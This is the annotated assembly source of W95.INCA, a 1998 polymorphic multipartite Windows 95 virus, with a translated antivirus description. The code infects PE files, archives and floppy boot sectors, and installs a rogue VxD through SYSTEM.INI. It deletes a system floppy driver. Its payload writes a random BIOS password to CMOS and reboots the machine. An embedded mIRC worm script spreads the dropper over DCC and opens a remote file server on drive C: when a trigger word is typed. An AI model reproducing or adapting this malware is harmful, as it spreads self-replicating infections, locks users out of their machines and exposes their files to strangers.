;[W95.INCA] Multipartite PE/BOOT polymorphic mIRC spreading infector
;Copyright 1998 (c) Vecna
;
;This is my first attempt at w95 plataform. Is a multipartite infector of PE
;filez, focused in fast spreading. It infect PE files by adding a new section
;randomly named and a polymorphic VxD-dropper. It infect ARJ/ZIP/RAR/LHA/PAK
;by adding a random named COM dropper, encripted by a polymorphic loop. It
;infect boot of floppies by adding a polymorphic loader to their boot sectorz.
;It spread over internet using DCC protocol provided by mIRC, using a worm to
;spread over channelz. In the internet part is also the payload activation.
;
;The polymorphic decriptor in PE files isnt based in math instructionz, but
;in swapping. This novel technic of encription should provide problemz to
;disinfection and detection i hope, as not the whole code is "encripted" , but
;just some chunkz. The polymorphic decriptor is filled by lotz of conditionalz
;and unconditional jumpz.
;
;The polymorphic engine that generate the droppers and the boot loader keep
;track of the contentz of all regz and flagz, as in advanced engines as
;Uruguay or Level3. This mean that if i need AX holding 0x0202, as for load 2
;sectorz in the boot loader, i can obtain this values using XOR AX, ??? or
;ADD AX, ??? and like.
;
;This source isnt compilable as is. Use the pre-compiled virus.
;
;
;Here's the description of w95/Inca by DrWeb, translated from russian to
;english by Lurker (thankz!!)
;
;
;Win95. Inca
;
;       Dangerous resident polymorphic multipartite virus. Win95.Inca
;       infects EXE files in a format of PE (Portable Executable) for
;       operation systems Windows95/98 and boot sectors of floppy
;       disks. And also Win95.Inca is a virus-worm for ARJ, LHA, LZH,
;       PAK, RAR and ZIP-archives and for the mIRC32 program.
;
;       When infected PE file is started, the virus receives management
;       and polymorphic decryptor deciphers the base code of a virus.
;       And this decoding is made by enough unusual way - in initial variant
;       the base virus code will contatin the table of indexes or displacements
;       of original bytes in the virus body. And it is necessary to understand
;       that decoding in this case will be substitution or compilation
;       original bytes on place of their one-byte indexes or displacements.
;       After given "assembly" of the code, virus determines (by
;       "already standard" for this type of viruses algorithm) the address
;       of interesting for it functions in KERNEL32.DLL and creates
;       a file C:\W95INCA.COM, in which file virus writes a polymorphic
;       DOS COM dropper.
;
;       This polymorphic 16bit DOS-code is already generated on infection of
;       the PE EXE-file, and because of that any "additional efforts" for
;       creation of a polymorphic copies on the given stage are not undertaken.
;       Then the created file is closed.
;       This dropper file is executed by the virus and then, after some delay,
;       deleted. Further the virus returnes back management to the
;       infected host PE-file.
;       This is all actions, which carries out a virus code in the PE EXE-file.
;       Therefore, it is possible to consider all infected PE EXE-files, as
;       droppers.
;
;       The C:\W95INCA.COM file, executed by the virus, determines Windows
;       directory (WINDIR) and tries to create in the \WINDOWS\SYSTEM folder
;       a file with the name FONO98.VXD.
;       If this attempt is successful, the virus unpacks
;       with the elementary algorithm, a code of the 32bit VxD-driver,
;       which is contained inside of the 16bit DOS-code, and writes it in
;       this newly created FONO98.VXD file.
;
;       Further virus opens a configuration Windows file SYSTEM.INI, searches
;       in it for the section "[386Enh]" and just below this line
;       writes a line "device=fono98.vxd".
;
;       After described manipulations, or, if the line "device=fono98.vxd"
;       is already is present in the SYSTEM.INI, or file FONO98.VXD
;       was created earlier in the \WINDOWS\SYSTEM folder, or,
;       if it wasn't possible to find the WINDOWS folder, virus finishes its
;       work and returns management to DOS.
;
;       After the system reboot and on the next startof Windows virus
;       VxD-driver FONO98.VXD is loaded by the system into a memory and
;       runned.
;
;       In a first task, the virus driver deletes system VxD-driver HSFLOP.PDR
;       in the catalogue \WINDOWS\SYSTEM\IOSUBSYS folder. Then virus reads
;       in memory a code from its own FONO98.VXD and creates in memory
;       three different polymorphic copies: for infection PE EXE-files,
;       for infection of boot-sectors of floppies and for creation of
;        16bit DOS droppers in a format of COM-files.
;       Futher, in a current session, and untill the next system reboot,
;       virus will infect the specified objects only with these copies.
;
;       Win95.Inca concerns to a class of the "slow polymorpics".
;       Further virus "intercepts" IFSMgr FileSystemApiHook and Int 13h
;       (disk operations), establishing on them its own events handlers.
;
;       IFSMgr handler of the virus supervises opening files. On the
;       opening files with extensions EXE and SCR, virus checks their
;       internal format, and if the opening files are Portable Executable,
;       virus infects them, by creating additional code section with a
;       random name in the header of PE-file and writing in its area virus
;       polymorphic code. On opening of archive files with the extensions
;       LHA, LZH, PAK, ZIP, ARJ or RAR, the virus adds to the given
;       archives its 16bit polymorphic code (worm) in a format of COM-file,
;       also modifies header of the archive files in such a manner that
;       the this virus-worm appears placed in the archive in a unpacked
;       form (store format) also receives a random name, consisting from
;       four letters, and with the extension COM or EXE (for example, AAAA.COM
;       or ABCD.EXE). On opening of the MIRC32.EXE file (program for
;       "chat" over the Internet) the virus writes or adds in the end
;       of the configuration file MIRC.INI, line " [fileserver]" and
;       "Warning = Off".
;
;       Also virus creates a new (if they exist on a disk) files SCRIPT.OLD,
;       SCRIPT.INI, INCA.EXE and REVENGE.COM.
;       In the file INCA.EXE, virus writes a code of the polymorphic 16bit
;       virus-worm. In the file REVENGE.COM - 231 bytes of the trojan code,
;       that rewrites the content of the CMOS-memory.
;       [*Authors Note - It put a password in AMI/AWARD BIOS*]
;
;       And in the file SCRIPT.INI virus writes text of the virus MIRC-worm.
;
;       On start of the MIRC32.INI under scenario of the SCRIPT.INI,
;       it runs the file INCA.EXE. Further under the same scenario it
;       tries to send files SCRIPT.INI (mIRC-worm) and INCA.EXE (virus
;       dropper) to computers of all members of the "chat conversation" in
;       the Internet.
;       If during the chat there will appaer a text string "El_inca",
;       under the scenario of the SCRIPT.INI - trojan program REVENGE.COM
;       will be launched. If somebody will "tell a word" "ancev",
;       the virus script "will allow" him to access disk  drive C:.
;       Even if this person is for several thousand miles from the infected
;       computer.
;
;       And if at the time of "conversation" there will appear a text
;        "_29A_", the program MIRC32.EXE will self-exits.
;
;       Virus handler of the disk operations on the Int 13h, supervises
;       the reading of the boot sectors of the floppes in the drive A:
;       and on an opportunity infects them, by replacing the original
;       boot loader with polymorphic, and writing on a disk its own
;       copies.
;
;       On a booting from such infected floppy, virus loader will
;       receive management, and will read to memory all sectors with the
;       virus code, "will intercept" Int 1Ch (timer), and then Int 21h.
;       A task of the  Int21h handler is simple - on the first
;       opportunity, it tries to create FONO98.VXD in the
;       C:\WINDOWS\SYSTEM folder and to register
;       it in the SYSTEM.INI configuration file (in the "[386Enh]" section).
;       The task is exactly the same, as well as performed by a
;       C:\W95INCA.COM file-dropper, algorithm of which was
;       described in the beginning.
;       A difference only that the dropper C:\W95INCA.COM determines
;       the lochation of Windows system folder fome a variable WINDIR.
;       And Int21h handler tries to place dropper in the C:\WINDOWS\SYSTEM
;       folder.
;       After the given attempt (successful or not) the virus
;       "releases" Int21h and neutralizes its own copy in memory.
;
;       The virus contains text "El Inca virus".
;
;       The size of the virus VxD-driver is 15327 bytes.
;
;       So, all infected objects can be considered as virus-hosts or droppers,
;       except created by the virus VxD-driver.
;       This VxD-driver installs virus copy in memory, and hits all other
;       objects. However you see that it does not infect
;       "similar to itself" VxD-drivers. VxD-driver is only the carrier
;       of an infection, but it is not an infected object.
;


         MINSIZEINFECT  EQU 8*1024             ;zopy me - i want to trawel


  BPB STRUC
         bpb_jmp db 3 dup (?)
         bpb_oem db 8 dup (?)
         bpb_b_s dw ?
         bpb_s_c db ?
         bpb_r_s dw ?
         bpb_n_f db ?
         bpb_r_e dw ?
         bpb_t_s dw ?
         bpb_m_d db ?
         bpb_s_f dw ?
         bpb_s_t dw ?
         bpb_n_h dw ?
         bpb_h_d dw ?
         bpb_sht db 20h dup (?)
  BPB ENDS

.386p
.XLIST
   Include Vmm.Inc
   Include Ifs.Inc
   Include Ifsmgr.Inc
.LIST

Declare_Virtual_Device FONO98, 1, 0, FONO98_Control, Undefined_Device_ID,,,

VxD_Locked_Code_Seg

       IncaName   db 'INCA.EXE', 0             ;Vars used by the virus
       NextHook   dd 0
       FileHandle dd 0
       FileSize   dd 0
       FileAttr   dd 0
       Pad        dd 0
       BufferOneHandle   dd 0
       BufferTwoHandle   dd 0
       VxDCompressedBuffer dd 0
       VxDCompressedSize   dd 0
       PolyBootSize        dd 0
       PolyBootBuffer      dd 0
       PolyDOSFileBuffer   dd 0
       PolyDOSFileSize     dd 0
       PolyPESize          dd 0
       PolyPEBuffer        dd 0
       VMF_handle dd 0
       VMF_size   dd 0
       VMF_base   dd 0
       OurFile     db 0
       FloppyInUse db 0
       UpDown     db 0
       Compressed db 0
       CrpTbl         db 200h dup (0)
     SectorBuffer     Equ This Byte
       CrcTab         db 2048 dup (0)
     FileName         Equ This Byte
       VMM32Path      db MAX_PATH dup (0)



       ZIPRHeaderId        db 'PK'             ;Structures used when
       ZIPRSignature       db 01, 02           ;infecting archivers
       ZIPRVerMade         dw 10
       ZIPRVerNeed         dw 0ah
       ZIPRFlags           dw 0
       ZIPRMethod          dw 0
       ZIPRTimeDate        dd 12345678h
       ZIPRCRC32           dd 0
       ZIPRCompressed      dd 0
       ZIPRUncompressed    dd 0
       ZIPRSizeFilename    dw ZIPRNameLenght
       ZIPRExtraField      dw 0
       ZIPRCommentSize     dw 0
       ZIPRDiskNumba       dw 0
       ZIPRInternalAttr    dw 01
       ZIPRExternalAttr    dd 21h
       ZIPROffsetLHeaderR  dd 0
       ZIPRFilename        db 'AAAA.COM'
     ZIPRNameLenght      Equ This Byte - offset32 ZIPRFilename
     ZIPRHeaderSize      Equ This Byte - offset32 ZIPRHeaderId

       ZIPLHeaderId        db 'PK'
       ZIPLSignature       dw 0403h
       ZIPLVersionNeed     dw 0010
       ZIPLFlags           dw 80h
       ZIPLMethod          dw 0
       ZIPLDateTime        dd 12345678h
       ZIPLCRC32           dd 0
       ZIPLCompressed      dd 0
       ZIPLUncompressed    dd 0
       ZIPLSizeFilename    dw ZIPLNameLenght
       ZIPLExtraField      dw 0
       ZIPLFilename        db 'AAAA.COM'
     ZIPLNameLenght      Equ This Byte - offset32 ZIPLFilename

     ZIPReadBuffer       Equ This Byte
       ZIPEHeaderId        db 'PK'
       ZIPSignature        dw 0
       ZIPNoDisk           dw 0
       ZIPNoStartDisk      dw 0
       ZIPEntryDisk        dw 0
       ZIPEntrysDir        dw 0
       ZIPSizeDir          dd 0
       ZIPOffsetDir        dd 0
       ZIPCommentLenght    dw 0
     ZIPEHeaderSize      Equ This Byte - offset32 ZIPEHeaderId

       ARJHeaderId         dw 0ea60h
       ARJHeaderSize       dw offset32 ARJHeaderCRC-offset32 ARJ1HeaderSize
       ARJ1HEaderSize      db offset32 ARJFilename-offset32 ARJ1HeaderSize
       ARJVersionDone      db 6
       ARJVersionNeed      db 1
       ARJHostOS           db 0
       ARJFlags            db 0
       ARJMethod           db 0
       ARJType             db 0
       ARJReserved         db 0
       ARJDateTime         dd 12345678h
       ARJCompressedSize   dd 0
       ARJUncompressedSize dd 0
       ARJFileCRC          dd 0
       ARJEntryname        dw 0
       ARJAccessMode       dw 21h
       ARJHostData         dw 0
       ARJFilename         db 'AAAA.COM',0
       ARJComment          db 0
       ARJHeaderCRC        dd 0
       ARJExtHeader        dw 0
       ARJEnd              dw 0ea60h, 0000h

       RARHeaderCRC        dw 0
       RARHeaderType       db 74h
       RARFileFlags        dw 08000h
       RARHeaderSize       dw offset32 RARHeaderEnd - offset32 RARHeaderCRC
       RARCompressedSize   dd 0
       RARUncompressedSize dd 0
       RARHostOS           db 0
       RARFileCRC          dd 0
       RARDateTime         dd 12345678h
       RARVersionNeed      db 14h
       RARMethod           db 30h
       RARFileNameSize     dw offset32 RARHeaderEnd - offset32 RARFileName
       RARFileAttribute    dd 21h
       RARFileName         db 'AAAA.COM'
     RARHeaderEnd        Equ This Byte

       LHASig              db LHAHeaderSize-2
       LHAHeaderCRC        db 0
       LHAMethod           db '-lh0-'
       LHACompressedSize   dd 0
       LHAUncompressedSize dd 0
       LHADateTime         dd 12345678h
       LHAFlags            dw 120h
       LHANameLenght       db offset32 LHASizeFilename - offset32 LHAFilename
       LHAFilename         db 'AAAA.COM'
     LHASizeFilename     Equ This Byte
       LHACRC16            dw 0
       LHAStuff            db 'M'
       LHAStuff2           dw 0
     LHAHeaderSize       Equ This Byte - offset32 LHASig



       MyVxDName db "FONO98.VXD",0
     SizeVxDName Equ This Byte - offset32 MyVxDName

       FloppyVxD       db "IOSUBSYS\HSFLOP.PDR", 0
     SizeFloppyVxDName Equ This Byte - offset32 FloppyVxD



       BootLoaderSize Equ BootLoaderEnd-BootLoader
     BootLoader:                               ;This code is inserted in
           cli                                 ;0/1/15 in 1.44 floppies
           xor ax, ax
           mov ss, ax
           mov sp, 7c00h                       ;It is loaded by the
           sti                                 ;polymorphic loader inserted
           cld                                 ;in the boot code
           mov ds, ax
           dec word ptr ds:[413h]
           int 12h                             ;reserve 1kb and copy ourself
           ror ax, 10                          ;to the reserved hole
           mov es, ax
           call delta
     delta:
           pop si
           push ds
           sub si, offset delta                ;full of bugs and hardcoded
           xor di, di                          ;references, as you can see :(
           push cs
           mov cx, 200h
           pop ds
           rep movsw                           ;copy 1kb of code
           pop ds
           push es
           push offset hstart
           retf                                ;continue in TOM
    hstart:
           xor ax, ax
           mov es, ax
           mov ax, 0201h
           mov cx, 0001h
           mov dx, 0180h
           mov bx, 7c00h
           int 13h                             ;read HDD boot sector
           cmp word ptr [bx+3h], 'SM'
           jne fuck
           cmp word ptr [bx+1f1h], 'IW'
           jne fuck
           xor eax, eax
           mov ds, ax
           mov dword ptr ds:[21h*4], eax       ;initialize int21
           mov ax, offset int1c
           mov si, 1ch*4
           mov di, offset old1c
           cli
           xchg ax, word ptr ds:[si]
           push cs
           pop es
           stosw
           mov ax, cs
           xchg ax, word ptr ds:[si+2]         ;hook int1c
           stosw
           sti
     fuck:
           cld
           xor ax, ax
           mov di, offset loader
           mov cx, offset fuck-offset loader
           rep stosb                           ;wipe some parts of loader
           db 0eah                             ;from memory to reduce
           dw 7c00h                            ;footprints
           dw 0
     Zopy0:
           push cs
           cld
           mov di, offset int1c
           mov cx, offset int1c-offset e_vxd
           sub ax, ax
           pop es
           rep stosb                           ;wipe all virus loader code
     no_4b00:                                  ;(less some bytes)
           popad
           pop es
           pop ds
           int 0ffh
           retf 2
     int1c:
           push ds
           pushad
           push 0
           pop ds
           mov cx, word ptr ds:[21h*4+2]
           db 081h, 0f9h                       ;cmp cx, 0
           dw 0
     i1c_check equ word ptr $ -2
           je not_yet                          ;did int21 seg changed?
           mov word ptr cs:[i1c_check], cx
           mov cx, 0
     time_2 equ word ptr $ -2
           inc word ptr cs:[time_2]            ;increase number of changes
           cmp cl, 3
           jnz not_yet                         ;changed 3 times?
           mov esi, 21h*4
           mov edi, 0ffh*4
           mov eax, dword ptr ds:[esi]
           mov dword ptr ds:[edi], eax         ;copy int21 to int0ff
           mov ax, cs
           rol eax, 16
           mov ax, offset int21
           mov dword ptr ds:[esi], eax         ;hook int21 to our code
           mov eax, dword ptr cs:[old1c]
           mov dword ptr ds:[1ch*4], eax       ;restore int1c
     not_yet:
           popad
           pop ds
           db 0eah
     old1c dd 0
     read_vxd:
           mov ax, 8000h                       ;if the floppy was retired,
           mov ds, ax                          ;shit happen... :(
           mov es, ax
           sub bx, bx
           mov dx, 0000h
           call read_last_track                ;read 79/0/1 and 79/1/1 to
           jc error                            ;mem
           mov dx, 0100h
           add bx, (18*512)
     read_last_track:                          ;init FDD controller
           sub ax, ax
           int 13h
           mov ax, 0212h
           mov cx, 4f01h
           int 13h                             ;read track(head is selected
     error:                                    ;above)
           ret
     int21:
           push ds
           push es
           pushad
           push 0
           pop ds
           cmp ax, 4b00h                       ;is first exec?
           jne no_4b00
           mov eax, dword ptr ds:[0ffh*4]
           mov dword ptr ds:[21h*4], eax       ;restore int21
           cld
           call infect_system                  ;drop our vxd
           jmp Zopy0                           ;and wipe loader out of mem
     infect_system:
           call read_vxd
           jc error
           sub si, si                          ;RLE compressed vxd is in mem
           mov di, ((18*512)*2)
           mov cx, word ptr cs:[c_vxd]
           call uncompress16                   ;uncompress VXD
           push cs
           pop ds
           call vxd
           db 'C:\WINDOWS\SYSTEM\FONO98.VXD', 0
     vxd:                                      ;when i said hardcoded
           pop dx                              ;reference, is this i mean :((
           mov ah, 5bh
           mov cx, 11b
           int 0ffh                            ;only create if not exists
           jc error
           xchg ax, bx
           push es
           pop ds
           mov cx, word ptr cs:[e_vxd]
           mov ah, 40h
           mov dx, ((18*512)*2)
           int 0ffh                            ;write uncompressed vxd
           jc close
           mov ah, 3eh
           int 0ffh
           push cs
           call system
           db 'C:\WINDOWS\SYSTEM.INI', 0       ;another hardcoded reference :(
     system:
           pop dx
           pop ds
           mov ax, 3d02h
           int 0ffh                            ;modify system.ini
           jc error
           mov ax, 8000h
           mov ds, ax
           sub dx, dx
           mov ah, 3fh
           mov cx, -1
           int 0ffh
           jc close                            ;read whole system.ini
           push cs
           pop es
           mov si, dx
           mov di, offset enh386
           mov cx, 10
     search:
           push di
           push si
           push cx
           rep cmpsb                           ;search for [Enh386] section
           je found
           pop cx
           pop si
           pop di
           inc si
           dec ax
           jnz search
           jmp close
     found:
           add sp, 6
           mov di, ax
           pusha
           mov di, offset device
           mov cx, 19
           rep cmpsb                           ;we are already registered?
           popa
           je close
           mov dx, si
           mov ax, 4200h
           int 0ffh
           jc close
           mov ah, 40h
           mov cx, 19
           mov dx, offset device
           int 0ffh                            ;write our device line
           jc close
           mov ah, 40h
           mov cx, di
           mov dx, si
           int 0ffh                            ;and rest of file
     close:
           mov ah, 3eh
           int 0ffh
           ret
     uncompress16:
           mov dx, di                          ;RLE decompression
           push dx
           mov bx, si
           add bx, cx
     next:
           lodsb
           or al, al
           jne store
           lodsw
           mov cx, ax
           xor ax, ax
           rep stosb
           dec di
     store:
           stosb
           cmp di, 0ff00h
           ja abortnow                         ;a safeguard to avoid mem
           cmp si, bx                          ;overwriting
           jbe next
     abortnow:
           pop bx
           mov cx, di
           sub cx, bx
           ret
     enh386 db '[386Enh]', 13, 10
     device db 'device=fono98.vxd', 13, 10
     VxDCompressSize dw 0
     VxDOriginalSize dw 0
     BootLoaderEnd Equ This Byte

       LoaderSize Equ LoaderEnd-Loader
     InfectWindows95 PROC                      ;This code is the main dropper
           call Delta                          ;for the viral VXD
     Delta:
           pop bp
           sub bp, offset Delta
           mov es, es:[2ch]                    ;get environment
           mov di, -1
     SearchWINDIR:
           inc di
           cmp di, 1024
           jae ReturnBack
           cmp byte ptr es:[di], 'w'           ;found a 'w'?
           jne SearchWINDIR
           push si
           push di
           lea si, [bp+offset WinDir]
           mov cx, 7
           rep cmpsb                           ;check if is windir=
           pop di
           pop si
           jne SearchWINDIR                    ;if not, keep searching
           add di, 7
           mov word ptr [bp+WinDX], di
           mov word ptr [bp+WinDS], es         ;save windows directory
           push es
           pop ds
           mov si, di
           push cs
           pop es
           lea di, [bp+offset Buffer]
     NextLetter:
           lodsb
           or al, al
           je CopyString
           stosb
           jmp NextLetter                      ;copy win95 dir to buffer
     CopyString:
           push cs
           pop ds
           lea si, [bp+offset SysDir]
     NextLetterAgain:
           lodsb
           stosb
           or al, al
           jnz NextLetterAgain                 ;append path and vxd name
           push cs
           push cs
           pop es
           pop ds
           mov ah, 5bh
           mov cx, 011b
           lea dx, [bp+offset Buffer]
           int 21h                             ;create vxd if it not exists
           jc ReturnBack
           push ax
           lea si, [bp+offset EndLoader]
           mov di, si
           add di, 30000
           mov cx, word ptr [bp+VxDSize1]
           call Uncompress16                   ;uncompress vxd
           pop bx
           mov ah, 40h
           mov cx, word ptr [bp+VxDSize2]
           int 21h                             ;write vxd
           jc Close
           mov ah, 3eh
           int 21h
     InfectSYSTEMINI:
           mov si, word ptr [bp+WinDX]
           mov ds, word ptr [bp+WinDS]
           lea di, [bp+offset Buffer]
     NextLtr:
           lodsb
           or al, al
           je CopyStr
           stosb
           jmp NextLtr                         ;copy windows dir to buffer
     CopyStr:                                  ;again
           push cs
           pop ds
           lea si, [bp+offset SysIni]          ;append system.ini
     NxtLetter:
           lodsb
           stosb
           or al, al
           jnz NxtLetter
           mov ax,3d02h
           lea dx, [bp+offset Buffer]
           int 21h
           jc ReturnBack                       ;open system.ini
           xchg ax, bx
           mov ah, 3fh
           mov cx, -1
           lea dx, [bp+offset VxDHere]
           int 21h
           jc Close
           mov si, dx
           lea di, [bp+offset Enh386]
           mov cx, 10
     Search:
           push di
           push si
           push cx
           rep cmpsb                           ;search for right section
           je Found
           pop cx
           pop si
           pop di
           inc si
           dec ax
           jnz Search
           jmp Close
     Found:
           add sp, 6
           mov di, ax
           pusha
           lea di, [bp+offset Device]
           mov cx, 19
           rep cmpsb                           ;already infected?
           popa
           je Close
           mov dx, si
           sub dx, offset VxDHere
           sub dx, bp
           mov ax, 4200h
           int 21h
           jc Close
           mov ah, 40h
           mov cx, 19
           lea dx, [bp+offset Device]
           int 21h                             ;write our device line
           jc Close
           mov ah, 40h
           mov cx, di
           sub cx, 10h
           mov dx, si
           int 21h
     Close:
           mov ah, 3eh
           int 21h
     ReturnBack:
           mov ax, 4c00h
           int 21h                             ;exit to DOS
     Uncompress16:
             mov dx, di
             push dx                           ;uncompress RLE
             mov bx, si                        ;(hmm... a bit redundant...)
             add bx, cx
     Next:
             lodsb
             or al, al
             jne Store
             lodsw
             mov cx, ax
             xor ax, ax
             rep stosb
             dec di
     Store:
             stosb
             cmp di, 0ff00h
             ja AbortNow
             cmp si, bx
             jbe Next
     AbortNow:
             pop bx
             mov cx, di
             sub cx, bx
             ret
     Enh386     db '[386Enh]', 13, 10
     Device     db 'device=fono98.vxd', 13, 10
     WinDir     db 'windir='
     SysIni     db '\SYSTEM.INI', 0
     SysDir     db '\SYSTEM\'
     VxDName    db 'FONO98.VXD',0
     WinDS      dw 0
     WinDX      dw 0
     UpDown     db 0
     Compressed db 0
     Buffer     db 64 dup(0)
     VxDSize2   dw 0
     VxDSize1   dw 0
     EndLoader  Equ This Byte
     VxDHere    Equ This Byte
     LoaderEnd Equ This Byte


BeginProc Compress32
         mov edx, esi                          ;compressor of modificated RLE
         add edx, ecx                          ;coded in 32bit
         xor eax, eax
         xor ecx, ecx
         push edi
  @1:
         lodsb
         or al, al
         jnz @2
         inc ecx
         jmp @1
  @2:
         or ecx, ecx
         jz @4
  @5:
         push eax
         xor eax, eax
         stosb
         xchg eax, ecx
         stosw
         pop eax
  @4:
         stosb
  @6:
         cmp esi, edx
         jbe @1
  @3:
         pop edx
         mov ecx, edi
         sub ecx, edx
         ret
EndProc Compress32

       Killer db 'REVENGE.COM', 0

       KCode Equ This Byte
     Payload:
           push 0f000h                         ;our copyrighted payload :)
           pop es
           xor di, di
           mov cx, -1
     scan:
           pusha
           mov si, offset award
           mov cx, 5
           repe cmpsb                          ;search ROM for AWARD signature
           popa
           jz award_psw
           inc di
           loop scan
           mov ax, 002fh                       ;if not found, assume AMI BIOS
           call read
           mov bx, ax
           mov al, 2dh
           call step1
           or al, 00010000b                    ;Put a random password in CMOS
           call step2                          ;memory, for ask it always,
           mov al, 2fh                         ;and correct checksum
           mov dh, bl
           call write
           mov al, 3eh
           call read
           mov ah, al
           mov al, 3fh
           call read
           mov bx, ax
           mov ax, 0038h
           call rndpsw
           mov al, 39h
           call rndpsw
           mov dh, bh
           mov al, 3eh
           call write
           mov dh, bl
           mov al, 3fh
           call write
           jmp hehehe
     award_psw:
           mov ax, 002fh
           call read
           mov bx, ax                          ;Put the password in CMOS
           mov al, 11h                         ;for AWARD BIOS machines
           call step1
           or al, 00000001b
           call step2
           mov al, 1bh
           call step1
           or al, 00100000b
           call step2
           mov al, 2fh
           mov dh, bl
           call write
           mov al, 7dh
           call read
           mov ah, al
           mov al, 7eh
           call read
           mov bx, ax
           mov ax, 0050h
           call rndpsw                         ;for ask always, and correcting
           mov al, 51h                         ;the checksum, of course :)
           call rndpsw
           mov dh, bh
           mov al, 7dh
           call write
           mov dh, bl
           mov al, 7eh
           call write
     hehehe:
           sti                                 ;reboot machine, so the user
           mov al, 0feh                        ;notice the payload soon ;)
           out 64h, al
           jmp hehehe
     read:
           and al, 7fh                         ;CMOS read
           out 70h, al
           jmp $+2
           jmp $+2
           in al, 71h
           ret
     write:
           and al, 7fh                         ;CMOS write
           out 70h, al
           jmp $+2
           mov al, dh
           out 71h, al
           ret
     rndpsw:                                   ;make random password but
           mov dh, al                          ;mantain correct checksum
           call read
           sub bx, ax
           in al, 40h
           add bx, ax
           xchg al, dh
           call write
           ret
     step1:
           mov dh, al                          ;checksum
           call read
           sub bx, ax
           ret
     step2:                                    ;checksum
           add bx, ax
           xchg al, dh
           call write
           ret
     award db 'AWARD'
       KCodeSize Equ $ - KCode


       ScriptSize Equ ScriptIniEnd - ScriptIni
     ScriptIni:
       [script]
       n0=run $mircdirinca.exe                 ;run virus dropper when mIRC
                                               ;start
       n1=ON 1:JOIN:#:{ /if ( $nick == $me ) { halt }
       n2= /dcc send $nick $mircdirscript.ini
       n3= /dcc send $nick $mircdirinca.exe
       n4=}
       n5=ON 1:PART:#:{ /if ( $nick == $me ) { halt }
       n6= /dcc send $nick $mircdirscript.ini
       n7= /dcc send $nick $mircdirinca.exe
       n8=}                                    ;on /JOIN and /LEAVE, we send
                                               ;the script and the virus
                                               ;dropper to the target
       n9=ON 1:TEXT:*el_inca*:#:/run $mircdirrevenge.com
                                               ;when this is said, the souls
                                               ;of thousands of dead Inca
                                               ;indians come to take revenge
       n10=ON 1:TEXT:*ancev*:#:/fserve $nick 666 c:\
                                               ;just for the case that the
                                               ;host have something i want ;)
       n11=ON 1:TEXT:*_29A_*:#:/quit
                                               ;everybody bow in awe before
                                               ;our power!!
     ScriptIniEnd Equ This Byte

       ScriptName db 'SCRIPT.INI', 0

       ScriptName2 db 'SCRIPT.OLD', 0

       MircIni db 'MIRC.INI', 0

       InsertSize Equ IMircIniEnd - IMircIni
     IMircIni:
       db 13, 10                               ;this is inserted in MIRC.INI
       db '[fileserver]', 13, 10               ;to avoid warnings when we
       db 'Warning=Off', 13, 10                ;start the /FSERVER
     IMircIniEnd Equ This Byte



BeginProc FONO98_Device_Init
         VMMCall Close_Boot_Log
         xor al, al
         mov [OurFile], al
         mov [UpDown], al
         mov [Compressed], al
         mov [FloppyInUse], al                 ;init flags
         in ax, 40h
         ror eax, 16
         in ax, 40h
         mov dword ptr [seed], eax             ;init rnd seed
         mov esi, offset32 ScriptIni
         mov edi, esi
         mov ecx, ScriptSize
  DecriptScript:
         lodsb
         not al                                ;decript viral script.ini
         stosb
         loop DecriptScript
  GetPathToVMM:
         cld
         VMMCall Get_Exec_Path
         jc ErrorDone
         mov edi, edx
         mov ecx, 0ffh
         xor al, al
         repne scasb                           ;find end of string
         sub edi, edx
         mov ecx, edi
         mov edi, edx
         mov esi, offset32 VMM32Path
         pushad
         xchg esi, edi
         push ecx
         rep movsb                             ;copy it to our buffer
         std                                   ;(next time i will use
         pop ecx                               ;GetSystemPath, i swear ;)
         mov al, "\"
         repne scasb
         cld
         inc edi
         inc edi
  DeleteFloppyVxD:
         pushad
         mov esi, offset32 FloppyVxD
         mov ecx, SizeFloppyVxDName
         rep movsb                             ;HSFLOP.PDR
         mov eax, R0_FILEATTRIBUTES+SET_ATTRIBUTES
         xor ecx, ecx
         mov esi, offset32 VMM32Path
         VxDCall IFSMgr_Ring0_FileIO           ;kill attribs and delete the
         mov eax, R0_DELETEFILE                ;32bit driver for floppies
         VxDCall IFSMgr_Ring0_FileIO
         popad
  CopyMyVxDName:
         mov esi, offset32 MyVxDName
         mov ecx, SizeVxDName
         rep movsb                             ;append viral vxd and path
         popad
  ReadVxDAndCompress:
         mov eax, R0_OPENCREATFILE
         mov ebx, 0ff00h
         xor ecx, ecx
         mov edx, 1
         VxDCall IFSMgr_Ring0_FileIO
         jc ErrorDone                          ;autopen vxd
         mov ebx, eax
         mov eax, R0_GETFILESIZE
         VxDCall IFSMgr_Ring0_FileIO
         jc ErrorDone
         mov [VxDOriginalSize], ax
         mov [VxDSize2], ax
         mov ecx, eax
         call AllocMemory                      ;alloc some memory and read
         jz ErrorDone                          ;our vxd to this buffer
         mov [BufferOneHandle], eax
         mov esi, eax
         mov eax, R0_READFILE
         xor edx, edx
         VxDCall IFSMgr_Ring0_FileIO
         jnc NoError
  ErrorFreeBlock:
         mov eax, [BufferOneHandle]
         call DeAllocMemory
         jmp ErrorDone
  NoError:
         mov eax, R0_CLOSEFILE
         VxDCall IFSMgr_Ring0_FileIO
         mov ecx, (512*18)*2
         call AllocMemory
         jz ErrorDone
         mov [BufferTwoHandle], eax
         mov esi, [BufferOneHandle]
         mov edi, eax
         mov [VxDCompressedBuffer], edi
         call Compress32                       ;compress VXD using a simple
         mov [VxDCompressSize], cx             ;RLE scheme
         mov [VxDCompressedSize], ecx
         mov [VxDSize1], cx
         mov esi, [BufferOneHandle]
         push esi
         mov byte ptr [maq], 0
         call gldr                             ;make poly boot (16bit)
         pop ecx
         xchg ecx, edi
         sub ecx, edi
         mov [PolyBootSize], ecx
         mov edx, [BufferOneHandle]
         push HEAPNOCOPY
         push ecx
         push edx
         VMMCall _HeapReAllocate               ;set buffer to right size
         add esp, 12
         mov [PolyBootBuffer], eax
         mov ecx, 20000
         call AllocMemory
         jz ErrorDone
         mov esi, eax
         push eax
         mov byte ptr [maq], -1
         call gldr                             ;generate file poly (16bit)
         mov ah, byte ptr [key]
         mov esi, offset32 Loader
         mov ecx, LoaderSize
  DosEncriptLoop:
         lodsb
         xor al, ah
         stosb
         loop DosEncriptLoop                   ;encript loader
         mov esi, [VxDCompressedBuffer]
         mov ecx, [VxDCompressedSize]
  DosEncriptLoop2:
         lodsb
         xor al, ah
         stosb
         loop DosEncriptLoop2                  ;zopy and encript vxd
         pop ecx
         mov edx, ecx
         xchg ecx, edi
         sub ecx, edi
         mov [PolyDOSFileSize], ecx
         mov [PEDOSSize], ecx
         push HEAPNOCOPY
         push ecx
         push edx
         VMMCall _HeapReAllocate
         add esp, 12
         mov [PolyDOSFileBuffer], eax
         mov ecx, 40000
